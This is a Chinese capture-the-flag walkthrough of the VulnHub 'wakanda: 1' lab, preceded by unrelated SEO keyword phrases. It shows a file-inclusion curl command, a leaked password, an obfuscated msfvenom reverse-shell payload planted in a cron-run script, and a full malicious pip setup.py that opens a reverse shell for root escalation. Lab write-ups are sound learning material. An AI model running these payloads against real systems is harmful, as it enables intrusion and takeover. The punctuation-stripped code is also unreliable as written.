网站cdn自己做,东莞常平网络推广外包,怎样做网站排名优化,智慧团建网站登录入口电脑版vulnhub#xff1a;wakanda: 1 ~ VulnHub
导入靶机#xff0c;放在kali同网段#xff0c;扫描 靶机在192.168.81.5#xff0c;扫描端口 四个端口#xff0c;详细扫描一下 似乎没什么值得注意的#xff0c;先看网站 就这一个页面#xff0c;点按钮也没反应#xff0c;扫…vulnhubwakanda: 1 ~ VulnHub
导入靶机放在kali同网段扫描 靶机在192.168.81.5扫描端口 四个端口详细扫描一下 似乎没什么值得注意的先看网站 就这一个页面点按钮也没反应扫目录 虽然扫到了但是所有页面大小都是0B也就是没有任何内容返回
回去再查看一下页面发现有这么一行注释 加上注释里的参数后页面变成了法语 尝试这个功能点是否存在文件包含
php://filter/convert.base64-encode/resourceindex 返回了一些东西使用curl完整的拿下来
curl http://192.168.81.5/?langphp://filter/convert.base64-encode/resourceindex Base64解码 找到一个密码
Niamey4Ever227!!!
网站底下写着站长mamadou猜测是他的密码尝试连接之间扫描到ssh端口为3333 连接成功后出来的不是shell而是Python命令行需要用Python生成交互式shell 找到第一个flag 在tmp文件夹下找到文件test里面什么都没有但是这个文件属于devops
查找devops的文件
find / -user devops 2/dev/null 找到一个py文件查看 看起来这个文件在不停的执行命令并且我们有写入权限写个木马进去
msfvenom -p cmd/unix/reverse_python lhost192.168.81.4 lport6789 R python -c exec(import(zlib).decompress(import(base64).b64decode(import(codecs).getencoder(utf-8)(eNqVkMEKgzAMhll9NTCqKsMp4weZDgYYxtM7zK7DmWuLUbff0idHnoyl58kX/6ENF9ruh6BkR/Vow1yAUNlOyMVwFwygP5xmLQ20AvMk5DxKGYxZzvsMaO7iPZx4nVAuKXMCZmy9FSeb1mxnOLKf14KfPikaVX6lsxabRWsidkvGmeHZdTHzfAXoMNCbB30yptCJ0ntqtovooOfdqK5dNMPtuW4KBqdAA1pj9b5WII)[0])))
我们只需要写入双引号里的东西
echo exec(import(zlib).decompress(import(base64).b64decode(import(codecs).getencoder(utf-8)(eNqVkMEKgzAMhll9NTCqKsMp4weZDgYYxtM7zK7DmWuLUbff0idHnoyl58kX/6ENF9ruh6BkR/Vow1yAUNlOyMVwFwygP5xmLQ20AvMk5DxKGYxZzvsMaO7iPZx4nVAuKXMCZmy9FSeb1mxnOLKf14KfPikaVX6lsxabRWsidkvGmeHZdTHzfAXoMNCbB30yptCJ0ntqtovooOfdqK5dNMPtuW4KBqdAA1pj9b5WII)[0]))) .antivirus.py 监听稍作等待大概需要几分钟 现在获取到了devops的shell之前搜索文件时看到他的家目录有第二个flag sudo -l显示我们可以无密码执行pip查看漏洞网站利用方式 找到一个exp
from setuptools import setup
from setuptools.command.install import install
import base64
import osclass CustomInstall(install):def run(self):install.run(self)RHOST 192.168.81.4 reverse_shell python -c import os; import pty; import socket; lhost \%s\; lport 9876; s socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\HISTFILE\, \/dev/null\); pty.spawn(\/bin/bash\); s.close(); % RHOSTencoded base64.b64encode(reverse_shell)os.system(echo %s|base64 -d|bash % encoded)setup(nameFakePip,version0.0.1,descriptionThis will exploit a sudoer able to /usr/bin/pip install *,urlhttps://github.com/0x00-0x00/fakepip,authorzc00l,author_emailandre.marquesesecurity.com.br,licenseMIT,zip_safeFalse,cmdclass{install: CustomInstall})
使用时记得改成kali的IP
在kali创建文件后开启Python的HTTP服务在靶机下载文件 靶机运行
sudo /usr/bin/pip install . --upgrade --force-reinstall
kali监听 提权完成最后的flag在root目录